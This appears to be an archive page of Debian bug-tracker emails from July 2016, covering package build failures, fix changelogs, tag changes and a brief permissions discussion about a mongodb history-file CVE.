We believe that the bug you reported is fixed in the latest version of
nvidia-cuda-toolkit, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 832...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andreas Beckmann  (supplier of updated nvidia-cuda-toolkit 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Sun, 31 Jul 2016 15:50:16 +0200
Source: nvidia-cuda-toolkit
Binary: nvidia-cuda-toolkit nvidia-cuda-doc nvidia-cuda-gdb nvidia-profiler 
nvidia-visual-profiler nvidia-nsight nvidia-cuda-dev nvidia-opencl-dev 
libcudart7.5 libcublas7.5 libnvblas7.5 libcufft7.5 libcufftw7.5 libcusparse7.5 
libcurand7.5 libnppc7.5 libnppi7.5 libnpps7.5 libcuinj64-7.5 libnvtoolsext1 
libnvvm3 libcupti7.5 libcupti-dev libcupti-doc libcusolver7.5 libnvrtc7.5
Architecture: source
Version: 7.5.18-3
Distribution: unstable
Urgency: medium
Maintainer: Debian NVIDIA Maintainers 
Changed-By: Andreas Beckmann 
Description:
 libcublas7.5 - NVIDIA cuBLAS Library
 libcudart7.5 - NVIDIA CUDA Runtime Library
 libcufft7.5 - NVIDIA cuFFT Library
 libcufftw7.5 - NVIDIA cuFFTW Library
 libcuinj64-7.5 - NVIDIA CUINJ Library (64-bit)
 libcupti-dev - NVIDIA CUDA Profiler Tools Interface development files
 libcupti-doc - NVIDIA CUDA Profiler Tools Interface documentation
 libcupti7.5 - NVIDIA CUDA Profiler Tools Interface runtime library
 libcurand7.5 - NVIDIA cuRAND Library
 libcusolver7.5 - NVIDIA cuSOLVER Library
 libcusparse7.5 - NVIDIA cuSPARSE Library
 libnppc7.5 - NVIDIA Performance Primitives core runtime library
 libnppi7.5 - NVIDIA Performance Primitives for image processing runtime librar
 libnpps7.5 - NVIDIA Performance Primitives for signal processing runtime libra
 libnvblas7.5 - NVBLAS runtime library
 libnvrtc7.5 - CUDA Runtime Compilation (NVIDIA NVRTC Library)
 libnvtoolsext1 - NVIDIA Tools Extension Library
 libnvvm3   - NVIDIA NVVM Library
 nvidia-cuda-dev - NVIDIA CUDA development files
 nvidia-cuda-doc - NVIDIA CUDA and OpenCL documentation
 nvidia-cuda-gdb - NVIDIA CUDA Debugger (GDB)
 nvidia-cuda-toolkit - NVIDIA CUDA development toolkit
 nvidia-nsight - NVIDIA Nsight Eclipse Edition
 nvidia-opencl-dev - NVIDIA OpenCL development files
 nvidia-profiler - NVIDIA Profiler for CUDA and OpenCL
 nvidia-visual-profiler - NVIDIA Visual Profiler for CUDA and OpenCL
Closes: 822783 832589
Changes:
 nvidia-cuda-toolkit (7.5.18-3) unstable; urgency=medium
 .
   * d/rules: Add missing build-arch/build-indep targets.  (Closes: #832589)
   * nvcc.profile: Add -D_FORCE_INLINES for better glibc 2.23 support.
 (Closes: #822783)
   

Bug#832836: marked as done (refcard: FTBFS: segfault during build)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:44:04 +
with message-id 
and subject line Bug#832836: fixed in refcard 9.0
has caused the Debian Bug report #832836,
regarding refcard: FTBFS: segfault during build
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
832836: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832836
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: refcard
Version: 5.0.9
Severity: serious
Tags: stretch sid
User: debian...@lists.debian.org
Usertags: qa-ftbfs-20160728 qa-ftbfs
Justification: FTBFS on amd64

Hi,

During a rebuild of all packages in sid, your package failed to build on
amd64.

Relevant part (hopefully):
> make[1]: Entering directory '/«PKGBUILDDIR»'
> cp -f entries.dbk entries-en.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/de.po -l 
> entries-de.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/pt.po -l 
> entries-pt.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ja.po -l 
> entries-ja.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/he.po -l 
> entries-he.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/tr.po -l 
> entries-tr.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/fr.po -l 
> entries-fr.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/vi.po -l 
> entries-vi.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/da.po -l 
> entries-da.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ca.po -l 
> entries-ca.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/sv.po -l 
> entries-sv.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/it.po -l 
> entries-it.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/hu.po -l 
> entries-hu.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/nb.po -l 
> entries-nb.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/lt.po -l 
> entries-lt.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/hi.po -l 
> entries-hi.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/fi.po -l 
> entries-fi.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/es.po -l 
> entries-es.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ar.po -l 
> entries-ar.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/eu.po -l 
> entries-eu.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/pl.po -l 
> entries-pl.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/cs.po -l 
> entries-cs.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/bg.po -l 
> entries-bg.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/id.po -l 
> entries-id.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/gl.po -l 
> entries-gl.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/uk.po -l 
> entries-uk.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/pt_BR.po -l 
> entries-pt_BR.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ml.po -l 
> entries-ml.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/nl.po -l 
> entries-nl.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ru.po -l 
> entries-ru.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/zh_CN.po -l 
> entries-zh_CN.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/sk.po -l 
> entries-sk.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ro.po -l 
> entries-ro.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/zh_TW.po -l 
> entries-zh_TW.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/el.po -l 
> entries-el.dbk
> po4a-translate --format docbook --keep 0 -m entries.dbk -p po4a/ms.po -l 
> entries-ms.dbk
> ( \
> LANG=C; export LANG; \
> echo ''; \
> echo ''; \
> for po in po4a/de.po po4a/pt.po po4a/ja.po po4a/he.po po4a/tr.po 
> po4a/fr.po po4a/vi.po po4a/da.po po4a/ca.po po4a/sv.po po4a/it.po po4a/hu.po 
> po4a/nb.po po4a/lt.po po4a/hi.po po4a/fi.po po4a/es.po po4a/ar.po po4a/eu.po 
> po4a/pl.po po4a/cs.po po4a/bg.po po4a/id.po po4a/gl.po po4a/uk.po 
> po4a/pt_BR.po po4a/ml.po po4a/nl.po po4a/ru.po po4a/zh_CN.po po4a/sk.po 
> po4a/ro.po po4a/zh_TW.po po4a/el.po po4a/ms.po; do \
>   L=`basename $po 

Bug#822783: marked as done (eztrace-contrib: FTBFS with libc 2.23: 'memcpy' was not declared in this scope)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:42:17 +
with message-id 
and subject line Bug#822783: fixed in nvidia-cuda-toolkit 7.5.18-3
has caused the Debian Bug report #822783,
regarding eztrace-contrib: FTBFS with libc 2.23: 'memcpy' was not declared in 
this scope
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
822783: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822783
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: eztrace-contrib
Version: 1.1-2-1
Severity: important
Tags: patch
User: debian-gl...@lists.debian.org
Usertags: 2.23

Hi Maintainer

Eztrace-contrib FTBFS with glibc 2.23 available in Experimental and
Ubuntu Xenial.

> /usr/include/string.h: In function ‘void* __mempcpy_inline(void*, const 
> void*, size_t)’:
> /usr/include/string.h:652:42: error: ‘memcpy’ was not declared in this scope
>return (char *) memcpy (__dest, __src, __n) + __n;
>   ^
> /usr/include/string.h: In function ‘void* __mempcpy_inline(void*, const 
> void*, size_t)’:
> /usr/include/string.h:652:42: error: ‘memcpy’ was not declared in this scope
>return (char *) memcpy (__dest, __src, __n) + __n;
>   ^
> /usr/include/string.h: In function ‘void* __mempcpy_inline(void*, const 
> void*, size_t)’:
> /usr/include/string.h:652:42: error: ‘memcpy’ was not declared in this scope
>return (char *) memcpy (__dest, __src, __n) + __n;

I found a similar issue had been reported for TensorFlow [1], and the solution:

> @e14159 can you try with -D_FORCE_INLINES? I just had the same issue with pcl,
> I checked the string.h header, and using that preprocessor directive skips 
> the block
> where the memcpy error appears. There's probably a cleaner workaround 
> though...

I also encountered and reported a similar issue in Theano [2].

I was able to get eztrace-contrib to build in Ubuntu by adding
-D_FORCE_INLINES to CPPFLAGS as per the attached patch.

Regards
Graham


[1] https://github.com/tensorflow/tensorflow/issues/1346
[2] https://github.com/Theano/Theano/pull/4369
diff -Nru eztrace-contrib-1.1-2/debian/rules eztrace-contrib-1.1-2/debian/rules
--- eztrace-contrib-1.1-2/debian/rules  2016-02-05 13:56:09.0 +0200
+++ eztrace-contrib-1.1-2/debian/rules  2016-03-31 14:13:55.0 +0200
@@ -3,6 +3,7 @@
 DEB_HOST_ARCH_CPU=$(shell dpkg-architecture -qDEB_HOST_ARCH_CPU)
 
 export DEB_BUILD_MAINT_OPTIONS = hardening=+all,-pie
+export DEB_CPPFLAGS_MAINT_APPEND = -D_FORCE_INLINES
 
 ifeq ($(DEB_HOST_ARCH_CPU),s390x)
 OPENMPI=no
--- End Message ---
--- Begin Message ---
Source: nvidia-cuda-toolkit
Source-Version: 7.5.18-3

We believe that the bug you reported is fixed in the latest version of
nvidia-cuda-toolkit, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 822...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andreas Beckmann  (supplier of updated nvidia-cuda-toolkit 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Sun, 31 Jul 2016 15:50:16 +0200
Source: nvidia-cuda-toolkit
Binary: nvidia-cuda-toolkit nvidia-cuda-doc nvidia-cuda-gdb nvidia-profiler 
nvidia-visual-profiler nvidia-nsight nvidia-cuda-dev nvidia-opencl-dev 
libcudart7.5 libcublas7.5 libnvblas7.5 libcufft7.5 libcufftw7.5 libcusparse7.5 
libcurand7.5 libnppc7.5 libnppi7.5 libnpps7.5 libcuinj64-7.5 libnvtoolsext1 
libnvvm3 libcupti7.5 libcupti-dev libcupti-doc libcusolver7.5 libnvrtc7.5
Architecture: source
Version: 7.5.18-3
Distribution: unstable
Urgency: medium
Maintainer: Debian NVIDIA Maintainers 
Changed-By: Andreas Beckmann 
Description:
 libcublas7.5 - NVIDIA cuBLAS Library
 libcudart7.5 - NVIDIA CUDA Runtime Library
 libcufft7.5 - NVIDIA cuFFT Library
 libcufftw7.5 - NVIDIA cuFFTW Library
 libcuinj64-7.5 - NVIDIA CUINJ Library (64-bit)
 libcupti-dev - NVIDIA CUDA Profiler Tools Interface development files
 libcupti-doc - NVIDIA CUDA Profiler Tools Interface documentation
 libcupti7.5 - NVIDIA CUDA Profiler Tools Interface runtime 

Processed: tagging 831124

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 831124 + fixed-upstream
Bug #831124 [src:guitarix] guitarix: FTBFS with GCC 6: 
../libgxwmm/gxwmm/gainline.h:25:110: error: call of overloaded 'abs(double)' is 
ambiguous
Added tag(s) fixed-upstream.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
831124: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831124
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#831897: marked as done (lepton: leaves a zombie process around after build)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:37:58 +
with message-id 
and subject line Bug#831897: fixed in lepton 1.2.1-2
has caused the Debian Bug report #831897,
regarding lepton: leaves a zombie process around after build
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
831897: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831897
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
package: lepton
version: 1.0-2
severity: serious
user: reproducible-bui...@lists.alioth.debian.org
usertags: ftbfs
x-debbugs-cc: reproducible-bui...@lists.alioth.debian.org

Dear maintainer,
while building packages I noticed that a builder stuck for a very long
time.  After inspection turns out it was waiting to be able to umount
/proc, which was kept busy by a process like
./lepton -socket=/tmp/f93406ea-94c9-45e3-a35b-bdfb1452a9ec -timebound=10ms 
-preload
with an open fd.

Killing that process unlocked the situation.

I was able to reproduce this in my notebook too.

That said, I find totally unacceptable for a build to leak a process and
leave it zombie (because that process had no parent, actually), so I'm
filing this at RC level.

(PS: in the meantime, blacklisted for reproducibility testing, but be
happy the build was reproducible (after having poked it) ;))

-- 
regards,
Mattia Rizzolo

GPG Key: 66AE 2B4A FCCF 3F52 DA18  4D18 4B04 3FCD B944 4540  .''`.
more about me:  https://mapreri.org : :'  :
Launchpad user: https://launchpad.net/~mapreri  `. `'`
Debian QA page: https://qa.debian.org/developer.php?login=mattia  `-


signature.asc
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: lepton
Source-Version: 1.2.1-2

We believe that the bug you reported is fixed in the latest version of
lepton, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
ChangZhuo Chen (陳昌倬)  (supplier of updated lepton package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sun, 31 Jul 2016 22:22:36 +0800
Source: lepton
Binary: lepton
Architecture: source amd64
Version: 1.2.1-2
Distribution: unstable
Urgency: medium
Maintainer: Debian PhotoTools Maintainers 

Changed-By: ChangZhuo Chen (陳昌倬) 
Description:
 lepton - tool to compress JPEGs losslessly
Closes: 831897
Changes:
 lepton (1.2.1-2) unstable; urgency=medium
 .
   * Patch to fix unit test so that it will not left lepton process.
 Closes: #831897
Checksums-Sha1:
 05aede89f7fe8ee4ffaced53026119ef712e937d 2019 lepton_1.2.1-2.dsc
 fa7a558816370de1fb5950fe51a9b6a71054a8f0 7364 lepton_1.2.1-2.debian.tar.xz
 08220f4bcf3121401494ee616b2f5a251cafe942 1524768 
lepton-dbgsym_1.2.1-2_amd64.deb
 c9d9b238c2b6eb504726c127108cf4c08343197a 149418 lepton_1.2.1-2_amd64.deb
Checksums-Sha256:
 8fe5bb9f1900bf949c94d702ca9fa2607a1cbeab266d753dc16406c2df41af0d 2019 
lepton_1.2.1-2.dsc
 53bc3d8fd0148bf30a8ed5a3fa81a7bb258f1fbee3afd17ce9d3f5aa55a1d8f8 7364 
lepton_1.2.1-2.debian.tar.xz
 85b0f909a94f239587f0369a8919bcfdc33c559de6fab87875ba690d60c25cd5 1524768 
lepton-dbgsym_1.2.1-2_amd64.deb
 6fd7a16662b5b9b42a4cc9c4df995cd5a7145a34408e641e3888591986ca78dd 149418 
lepton_1.2.1-2_amd64.deb
Files:
 1d8ae5c94044ed956a42b7c0dff974a8 2019 graphics optional lepton_1.2.1-2.dsc
 64b80913bc2af06692b8e78f58e2cd68 7364 graphics optional 
lepton_1.2.1-2.debian.tar.xz
 46079dba5eea23c6fe38ee941ac7a0fc 1524768 debug extra 
lepton-dbgsym_1.2.1-2_amd64.deb
 657a20117a759cd130aa9035d605585e 149418 graphics optional 
lepton_1.2.1-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJXngrtAAoJELTYlw90nD9qaZEP/0QHskfeDse+4D1vK6Oh5Jy3
H4a5HgdTeDZbAg2hJkbyXY0Xc9aLS1dqqH0tNBwNxa497ybUtyRgixEPOj76DyeH
jPLTIW9fSrYzI5PlDTQyZK7sWxW4OTXG7Fi6vcpwT3Zl6uyaNsX+tisLM8tqYrxW
wlgQAwEl3SeWNUhbzHATMNFMKaShLdMag9WClcFzxuOrhqhWX4+LmuJKZBrogAhu
eRBKTSsSvxK1fzIAnKhuI9o6EpW2rqxEx+rN6GR7Qt9Mq5QwfkNMbcaTlUGnkUcD

Bug#830267: marked as done (dpkg: Segmentation fault when purging package in APT test case)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:34:22 +
with message-id 
and subject line Bug#830267: fixed in dpkg 1.18.10
has caused the Debian Bug report #830267,
regarding dpkg: Segmentation fault when purging package in APT test case
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
830267: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830267
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: dpkg
Version: 1.18.9
Severity: serious

dpkg fails to purge a package in our test suite, crashing with a segmentation 
fault. You can reproduce
it by building apt and running 
test/integration/test-bug-712116-dpkg-pre-install-pkgs-hook-multiarch -
I have also included the backtrace here.

#0  namenodetouse (namenode=0x0, pkg=pkg@entry=0x560c3548cfb0, 
pkgbin=pkgbin@entry=0x560c3548d000) at ../../src/help.c:58
r = 
#1  0x560c33884750 in removal_bulk_remove_configfiles (pkg=0x560c3548cfb0) 
at ../../src/remove.c:533
usenode = 
removevb_state = {used = 0}
fnvb = {used = 65, size = 74, buf = 0x560c35491730 
"/tmp/user/1000/tmp.g6iz3eF7hX/rootdir/etc/compiz.conf/compiz.conf"}
removevb = {used = 0, size = 0, buf = 0x0}
namenode = 
conffbasenamelen = 
conffbasename = 
lconffp = 
de = 
p = 
dsd = 
rc = 
conffnameused = 
conff = 0x560c3548d1b0
searchfile = 
ext = 
removeconffexts = {0x560c338a8def "~", 0x560c338a4d45 ".bak", 
0x560c338a4d4a "%", 0x560c3389dc6b ".dpkg-tmp", 0x560c3389dc75 ".dpkg-new", 
0x560c338a4d4c ".dpkg-old", 0x560c3389f0b1 ".dpkg-dist", 0x0}
#2  removal_bulk (pkg=pkg@entry=0x560c3548cfb0) at ../../src/remove.c:637
foundpostrm = 
#3  0x560c33885553 in deferred_remove (pkg=0x560c3548cfb0) at 
../../src/remove.c:192
raemsgs = {used = 0, size = 0, buf = 0x0}
dep = 
rok = DEP_CHECK_OK
#4  0x560c33883142 in process_queue () at ../../src/packages.c:288
rundown = 
pkg = 0x560c3548cfb0
action_todo = act_purge
ejbuf = {{__jmpbuf = {0, 1008670450863515041, 1, 140722198930704, 0, 0, 
-1006724711060265567, -6780200583402150495}, __mask_was_saved = 0, __saved_mask 
= {__val = {140240791502169, 140722198930256, 94610404235612, 140722198930256, 
94610404235761, 0, 16, 94610433560496, 94610404104128, 140722198930704, 0, 0, 
140240791507784, 0, 94610404214745, 140722198930704
istobe = 
__func__ = "process_queue"
__PRETTY_FUNCTION__ = "process_queue"
#5  0x560c33883488 in packages (argv=) at 
../../src/packages.c:162
No locals.
#6  0x560c338756a9 in main (argc=, argv=0x7ffc70ade568) at 
../../src/main.c:901
ret = 

-- System Information:
Debian Release: stretch/sid
  APT prefers unstable
  APT policy: (900, 'unstable'), (500, 'unstable-debug'), (500, 'testing'), 
(500, 'stable'), (100, 'experimental'), (1, 'experimental-debug')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.6.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages dpkg depends on:
ii  libbz2-1.0   1.0.6-8
ii  libc62.22-13
ii  liblzma5 5.1.1alpha+20120614-2.1
ii  libselinux1  2.5-3
ii  tar  1.29-1
ii  zlib1g   1:1.2.8.dfsg-2+b1

dpkg recommends no packages.

Versions of packages dpkg suggests:
ii  apt  1.3~exp3

-- no debconf information

-- 
Debian Developer - deb.li/jak | jak-linux.org - free software dev

When replying, only quote what is necessary, and write each reply
directly below the part(s) it pertains to (`inline'). Thank you.
--- End Message ---
--- Begin Message ---
Source: dpkg
Source-Version: 1.18.10

We believe that the bug you reported is fixed in the latest version of
dpkg, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 830...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Guillem Jover  (supplier of updated dpkg package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED 

Bug#817388: marked as done (cbedic: Removal of debhelper compat 4)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:34:13 +
with message-id 
and subject line Bug#817388: fixed in cbedic 4.0-4
has caused the Debian Bug report #817388,
regarding cbedic: Removal of debhelper compat 4
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
817388: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=817388
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: cbedic
Severity: important
Usertags: compat-4-removal

Hi,

The package cbedic uses debhelper with a compat level of 4,
which is deprecated and scheduled for removal.

 * Please bump the debhelper compat at your earliest convenience.
   on the 15th of June.
   - Compat 9 is recommended
   - Compat 5 is the bare minimum
   - If the package has been relying on dh_install being lenient about
 missing files, please see "MIGRATING TO COMPAT 5 OR LATER" in [1].

 * Compat level 4 will be removed on the first debhelper upload after
   the 15th of June.

Thanks,
~Niels

[1] https://lists.debian.org/debian-devel/2015/09/msg00257.html
--- End Message ---
--- Begin Message ---
Source: cbedic
Source-Version: 4.0-4

We believe that the bug you reported is fixed in the latest version of
cbedic, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 817...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Anton Zinoviev  (supplier of updated cbedic package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Sun, 31 Jul 2016 18:08:05 +0300
Source: cbedic
Binary: cbedic
Architecture: source amd64
Version: 4.0-4
Distribution: unstable
Urgency: medium
Maintainer: Anton Zinoviev 
Changed-By: Anton Zinoviev 
Description:
 cbedic - Text-mode Bulgarian/English Dictionary
Closes: 817388
Changes:
 cbedic (4.0-4) unstable; urgency=medium
 .
   * Raise debhelper compat level from 4 to 9.  Closes: #817388.
   * Fix some lintian warnings (debhelper-but-no-misc-depends,
 dh-clean-k-is-deprecated, debian-rules-missing-recommended-target,
 hardening-no-relro).
Checksums-Sha1:
 4dbdea85ad644415265bd4e36a0d6557bb9ea92d 1604 cbedic_4.0-4.dsc
 4130da699016a345733abeaf371dbca0c9cc2273 2830 cbedic_4.0-4.diff.gz
 fafc3553db1c672276e78709a2fb3d2f316fc041 23566 cbedic_4.0-4_amd64.deb
Checksums-Sha256:
 46fe9dd09f25c4de88b09eefc1f71439aad263ed3882508117cef7a6a5c6e5dd 1604 
cbedic_4.0-4.dsc
 cd681674f593a905f29ec15f3bac155d08a0343134799372722ce382d476909f 2830 
cbedic_4.0-4.diff.gz
 81f09ac0b29e8fdd9a6a61cb44aebf7f113004019ee154b3ae248023bd0eef65 23566 
cbedic_4.0-4_amd64.deb
Files:
 4d6ddf6aab1cb905b01e01221a439f54 1604 contrib/text optional cbedic_4.0-4.dsc
 3cee5ffc70902a94df7167d28c6ac98e 2830 contrib/text optional 
cbedic_4.0-4.diff.gz
 ea2378996aa0a76a98cae8dbad4dcab3 23566 contrib/text optional 
cbedic_4.0-4_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJXnhiPAAoJEJO3FuOT+ximLukP/iAZqjKaNIjTGfdBHyIxdp9A
ZrwrGa5wD0ZBsDsd3CJ09/bPrj45EPvGK3teFlFuTW9yLqyS7fZWdp1psfDWMS6f
r8gzMbpg3jluFlMhG3tq+cnuZTtoGXHcZsZ5AFHMJ4h2+97DQxgJbWckPq0siYeY
Aj0Rue/3eqEt4BCtf9YSbl09/fEcqbiJEqdUrgKrXkoZnRM+cV7+rcBpdqqqe/Yp
yo//vItoc2AXqQVLY0nhLSc2r+KuwWcwGcwztRZ3YUgGJUYYrzNr0lkdfB+mIexq
XaBUTlhpI27/ENlNfYG/ainYWQe4eZZKYIeD4vC+PUoMniZYgaFWrpsr4e7TddKb
ReG05MzRcPOtpjhbrWqp4O/wPIzb0ineUoJVvteMmesB6BQxAbT2Zqqvu/6v0WAL
SFzBfE3NTXLS0Lyo5/O7jlcPCB504ZAss1T4JD+2vaplwE5DykXb5gFeLVp5C8SF
cQsVD2kQ3yucWnuK93bEySViZCtB/5jh4//DWCbENjWuBBzbN4YYsylFwcaTejSn
Efcx4I+ZJJMMdDBH8kxrCbqV4GoeKsFb3fFXpRDwCfNh+e61PnmyuAMUxE1olGVY
Jrsjii8a0weUk13m3UwTMOvKDKCt+hJsfbHoCq/A1DGOOn2MvGWUIH66Psn05b3d
Z46znyp0hSYzc3xzcIOP
=qHk7
-END PGP SIGNATURE End Message ---

Processed: tagging 831462

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 831462 - patch
Bug #831462 [sbuild] sbuild: requires gpg in chroot but does not install it
Removed tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
831462: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831462
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 831462

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 831462 + pending
Bug #831462 [sbuild] sbuild: requires gpg in chroot but does not install it
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
831462: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831462
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 831462

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 831462 + patch
Bug #831462 [sbuild] sbuild: requires gpg in chroot but does not install it
Added tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
831462: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831462
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832908: mongodb: CVE-2016-6494: world-readable .dbshell history file

[kpcyrd]

On Sat, Jul 30, 2016 at 05:53:10AM +, László Böszörményi (GCS) wrote:
> While this is a real issue, I somewhat agree with upstream. Being a
> system administrator for long time, I know as others should know:
> - don't run sensitive services on a machine which can be accessed by
> untrusted users,
> - even on your regular box set your $HOME to 0700 and your umask to 0077.
> In short, always expect the worst case and be prepared.

As a system administrator, I fully agree that systems should be setup
this way. You might want to consider posting this here[1] and here[2].

